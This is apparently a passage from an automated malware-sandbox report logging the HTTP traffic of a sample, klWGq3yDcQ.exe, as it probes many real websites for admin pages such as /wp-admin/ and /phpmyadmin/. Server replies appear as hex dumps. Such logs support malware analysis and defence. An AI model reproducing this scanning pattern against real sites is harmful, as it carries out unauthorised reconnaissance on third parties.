                                                                                                                                                                                                    Nov 26, 2023 06:59:32.852588892 CET378INData Raw: fc d1 68 b8 28 f4 96 21 6e cf cc c2 22 6e 27 8c 40 1d 95 ff b2 29 ff 56 60 14 7f 55 87 51 6d 17 0c 5d e2 2a 6a e5 81 87 7b 10 8e d7 cf 29 f7 2b c4 9a 13 dc 0b 55 d5 95 f9 14 c2 a6 4e 97 ed a0 68 c7 e0 d4 e2 86 b0 86 1b 5d 28 4c 8c 34 28 ce 00 57
                                                                                                                                                                                                    Data Ascii: h(!n"n'@)V`UQm]*j{)+UNh](L4(WDE5TS#w.9bI:E;[r?5qV\l"qBt9C(3rN#M8!sVMl{kvwllUvznbyo^)%S? xp8*xM
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.867894888 CET378INData Raw: fc d1 68 b8 28 f4 96 21 6e cf cc c2 22 6e 27 8c 40 1d 95 ff b2 29 ff 56 60 14 7f 55 87 51 6d 17 0c 5d e2 2a 6a e5 81 87 7b 10 8e d7 cf 29 f7 2b c4 9a 13 dc 0b 55 d5 95 f9 14 c2 a6 4e 97 ed a0 68 c7 e0 d4 e2 86 b0 86 1b 5d 28 4c 8c 34 28 ce 00 57
                                                                                                                                                                                                    Data Ascii: h(!n"n'@)V`UQm]*j{)+UNh](L4(WDE5TS#w.9bI:E;[r?5qV\l"qBt9C(3rN#M8!sVMl{kvwllUvznbyo^)%S? xp8*xM


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    134192.168.2.457151162.241.62.220806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.656028986 CET280OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: lumaruniformes.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://lumaruniformes.com/wp-login.php


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    135192.168.2.457123185.183.156.218806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.700594902 CET227OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: federwild.at
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.888041019 CET947INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Last-Modified: Thu, 12 Sep 2019 15:06:38 GMT
                                                                                                                                                                                                    ETag: W/"3fe-5925c7bf8c9e3"
                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                    Data Raw: 32 35 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 65 53 dd 6b db 30 10 7f f7 5f 71 f3 4b 5f f2 b1 8e 6e 0f c3 0b a4 24 a3 81 76 1d 4d c6 28 a5 0c c5 3a c5 a2 b2 e4 49 a7 ba fe ef 7b b2 92 32 ba 17 1b db fa 7d de b9 ba da dd 5c 2f 8a ea 6a bd 5c f1 6d b7 d9 5d af 17 17 1f 2f e0 87 23 f8 ee a2 95 d5 3c bf 2c aa cb e5 76 0d 8d 47 f5 ad 9c a3 f7 ce ff 91 ae 0e f3 72 51 7d 98 4e 1f b4 02 43 08 9b 35 7c 79 5c 54 f3 74 98 3f 3c a0 95 5a 3d 4e a7 4c 3e 3f 8a 5c de ae ee 93 e4 f9 e2 1f 11 7e 2a 76 0d 82 c7 bf 11 03 a1 04 26 8f 2d 5a 82 5e 04 b0 6c 47 25 3b e0 2c 50 a3 03 04 f4 cf e8 67 45 f5 33 71 dd f1 65 b9 5a dd ad b7 db 45 f1 1b f7 b0 1d 3f 83 60 18 4a f4 bd 36 72 26 88 4d bc 9d 62 8f d9 c8 3c 77 50 a4 18 05 00 4c e1 97 55 ce 53 b4 82 d0 0c 13 b8 d1 b5 77 c1 29 82 86 ad 08 29 d9 9d 80 da 20 1b 00 8b 7d 06 95 0a 05 45 8f 25 90 83 8d 25 f4 16 09 d6 2f 9d 71 9e 8d c2 46 b1 71 04 c2 17 02 a7 32 46 58 18 9b 3c 0b d0 62 08 e2 80 c0 d1 4a 72 0e 42 2b 8c 29 27 10 3a ac b5 d2 35 3f 0d 19 64 f8 24 53 31 f6 f3 f9 27 d8 0f 84 61 f2 bf 20 37 c9 6e 6c c8 18 4d 01 5c 7f 54 3b 69 cd e0 de 45 a8 99 28 9d 4c 94 c9 99 9a 64 c8 3e 12 68 62 67 1d 33 d1 00 e4 75 fd c4 37 07 4a f3 1c 42 af a9 6e 18 6d 0c ca 8c 28 d9 b3 a7 9c e8 a4 11 ca 19 ec 12 71 8b c2 b2 4f a7 a0 76 d1 07 3c aa 8c a2 a1 e1 ba df e1 40 78 84 1a 6d e0 f6 24 a7 04 89 4a 44 43 b3 ac b5 d9 6c 41 98 5e 0c e1 14 f4 3d 7e 64 4e 24 c6 d9 43 06 a1 75 f1 d0 a4 08 ad 78 e2 5d 7d 3f 24 9e 6f d7 0d c9 30 66 40 ef fc 93 f0 e3 de f1 5c 8e 45 04 dd 76 06 bf 42 27 e4 38 d1 71 82 f9 fc 69 88 dc 4d c3 2b b2 d7 07 4e db 8e 5b 6c 34 2b 8e 9b cb f2 5d 0c 0d 97 9b 41 2e ad 51 5a 0d a5 9f 11 1a 5e f2 94 58 70 c7 d4 a3 e1 57 e3 88 a1 d5 56 b7 b1 3d e6 bf 7d eb 71 9c 1b 8f 09 5f 44 4d 66 80 3e b5 3d b8 78 c6 d1 3d 0a a9 4f e9 bd 3e 34 c4 7f 52 9f 29 f8 97 7c 05 7e a9 4a 3b fe 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 25ceSk0_qK_n$vM(:I{2}\/j\m]/#<,vGrQ}NC5|y\Tt?<Z=NL>?\~*v&-Z^lG%;,PgE3qeZE?`J6r&Mb<wPLUSw)) }E%%/qFq2FX<bJrB+)':5?d$S1'a 7nlM\T;iE(Ld>hbg3u7JBnm(qOv<@xm$JDClA^=~dN$Cux]}?$o0f@\EvB'8qiM+N[l4+]A.QZ^XpWV=}q_DMf>=x=O>4R)|~J;0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    136192.168.2.45711681.19.159.64806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.700700998 CET241OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: www.grg17geblergasse.at
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    137192.168.2.457190144.202.62.131806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.764472961 CET235OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: gruporegiosafety.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.888185024 CET507INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Location: https://gruporegiosafety.com/phpmyadmin/
                                                                                                                                                                                                    Content-Length: 248
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 72 75 70 6f 72 65 67 69 6f 73 61 66 65 74 79 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://gruporegiosafety.com/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    138192.168.2.457111191.252.51.5806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.764610052 CET233OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: financefast.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    139192.168.2.457121213.0.13.44806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.764698982 CET230OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    140192.168.2.457167185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.764761925 CET232OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.grantstech.io
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.947669983 CET732INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Content-Length: 328
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Location: https://www.grantstech.io/phpmyadmin/
                                                                                                                                                                                                    Cache-Control: max-age=0
                                                                                                                                                                                                    Expires: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    X-Cache-Status: MISS
                                                                                                                                                                                                    X-Cache-Key: http://www.grantstech.io/phpmyadmin/
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 61 6e 74 73 74 65 63 68 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.grantstech.io/phpmyadmin/">here</a>.</p><hr><address>Apache/2.4.56 (Debian) Server at www.grantstech.io Port 80</address></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    141192.168.2.45717335.164.64.246806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.764864922 CET228OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: belongfbg.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    142192.168.2.4573193.33.130.190806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.764916897 CET224OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: gmailvz.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.863863945 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: openresty
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 1177
                                                                                                                                                                                                    Last-Modified: Mon, 13 Nov 2023 23:35:06 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "6552b2aa-499"
                                                                                                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_FQoxgprFehvj2p8yLCgcFG18Z4poDRSAt/UdDOCXzmOXaDDdgcX1NNB0/lwPPc6N21tgsFZdNfVSJPkIVLBe5w
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Set-Cookie: caf_ipaddr=10.116.88.246;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 63 6f 6e 74 65 6e 74 2d 6d 61 69 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 3e 46 6f 72 20 66 75 6c 6c 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 6f 66 20 74 68 69 73 20 73 69 74 65 20 69 74 20 69 73 20 6e 65 63 65 73 73 61 72 79 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 2e 20 48 65 72 65 20 61 72 65 20 74 68 65 20 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></title><script src="https://www.google.com/adsense/domains/caf.js?abp=1" type="text/javascript"></script><noscript><style>#content-main{display:none}</style><div>For full functionality of this site it is necessary to enable JavaScript. Here are the <a target="_blank" rel="noopener noreferrer" href="https://
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.863877058 CET669INData Raw: 77 77 77 2e 65 6e 61 62 6c 65 2d 6a 61 76 61 73 63 72 69 70 74 2e 63 6f 6d 2f 22 3e 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 69 6e 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77
                                                                                                                                                                                                    Data Ascii: www.enable-javascript.com/">instructions how to enable JavaScript in your web browser</a>.</div></noscript><script type="application/javascript">window.LANDER_SYSTEM="PW"</script><script type="text/javascript">var abp=void 0</script><script ty
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.882200956 CET669INData Raw: 77 77 77 2e 65 6e 61 62 6c 65 2d 6a 61 76 61 73 63 72 69 70 74 2e 63 6f 6d 2f 22 3e 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 69 6e 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77
                                                                                                                                                                                                    Data Ascii: www.enable-javascript.com/">instructions how to enable JavaScript in your web browser</a>.</div></noscript><script type="application/javascript">window.LANDER_SYSTEM="PW"</script><script type="text/javascript">var abp=void 0</script><script ty


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    143192.168.2.45717481.169.145.157806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.766113997 CET226OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: kappablu.de
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    144192.168.2.45732915.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.768510103 CET228OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: greenrworld.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.866576910 CET418INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 125
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Server: ip-10-123-122-53.ec2.internal
                                                                                                                                                                                                    X-Request-Id: 21062e9b-de89-4f44-802e-371bfef32e49
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    145192.168.2.457331172.96.186.206806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    146192.168.2.457305103.224.212.226806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    147192.168.2.45712413.234.155.54806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    148192.168.2.45732145.40.150.54806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    149192.168.2.457516172.96.186.206806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    150192.168.2.457416162.210.96.117806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    151192.168.2.457239202.226.37.158806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    152192.168.2.45731889.31.143.1806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    153192.168.2.457420104.247.74.107806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    154192.168.2.45741915.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    155192.168.2.457519133.130.97.143806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    156192.168.2.457531117.20.63.148806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    157192.168.2.4577093.234.162.143806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    158192.168.2.4577743.33.130.190806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    159192.168.2.45776534.136.104.255806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    160192.168.2.457898192.96.211.44806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    161192.168.2.457830178.32.41.233806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    162192.168.2.45781981.169.145.74806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    163192.168.2.457831191.6.210.8806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    164192.168.2.457893185.135.132.105806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
